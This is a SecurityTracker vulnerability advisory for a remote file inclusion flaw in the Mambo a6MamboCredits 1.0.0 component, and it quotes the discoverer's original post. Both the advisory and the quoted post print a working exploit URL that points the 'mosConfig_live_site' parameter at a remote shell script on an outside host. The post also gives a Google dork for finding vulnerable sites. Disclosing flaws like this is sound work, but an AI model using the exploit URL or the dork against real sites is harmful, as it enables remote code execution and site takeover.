SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  a6MamboCredits Vendors:  active6
a6MamboCredits Include File Bug in 'mosConfig_live_site' Parameter Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016716
SecurityTracker URL:  http://securitytracker.com/id?1016716
CVE Reference:  CVE-2006-4288   (Links to External Site)
Updated:  Jun 5 2008
Original Entry Date:  Aug 18 2006
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0.0
Description:  Charles Nelwan (Cmaster4) reported a vulnerability in a6MamboCredits. A remote user can include and execute arbitrary code on the target system.

The software does not properly validate user-supplied input in the 'mosConfig_live_site' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target[/administrator/components /com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  mambo.active6.com/index.php?option=com_content&task=view&id=22&Itemid=65 (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Charles Nelwan" <cnelwan@gmail.com>
Message History:   None.

 Source Message Contents
Date:  Thu, 17 Aug 2006 20:50:49 -0600
From:  "Charles Nelwan" <cnelwan@gmail.com>
Subject:  Mambo a6mambocredits component v1.0.0 &lt;== (mosConfig_live_site) Remote File Include Vulnerabilities

 
 
Title : Mambo a6mambocredits component v1.0.0 <== (mosConfig_live_site) Remote File Include Vulner
abilities
 
Affected Application: Mambo a6mambocredits component v1.0.0
 
(Mambo CMS Component)
 
 
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
Discoverd/Found by: Charles Nelwan a.k.a Cmaster4
 
Team: #BatamHacker irc.dal.net crew
 
URL: http://www.batamhacker.info/forum
 
E-Mail: bugtraq_indo@yahoo.com
 
 
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
Typ: Remote [x] Local [ ]
 
Remote File Inclusion [x] SQL Injection [ ]
 
Level: Low [ ] Middle [x] High [ ]
 
Application: Mambo a6mambocredits
 
Version: 1.0.0
 
Vulnerable File: admin.a6mambocredits.php
 
URL: www.active6.com
 
Description: Mambo 4.5.1 component to display component credits in one central page.
 
google dork : inurl:"com_a6mambocredits"
 
 
 
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_
live_site=http://Senjata.com/tembuspakeshell.txt
 
 
Shoutz:
~~~~~~
~ Special Greetz To My BATAMHACKER CREW ON IRC.DAL.NET h4ntu, havicaz, baylaw
~ To All Indonesian Underground Hacker


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC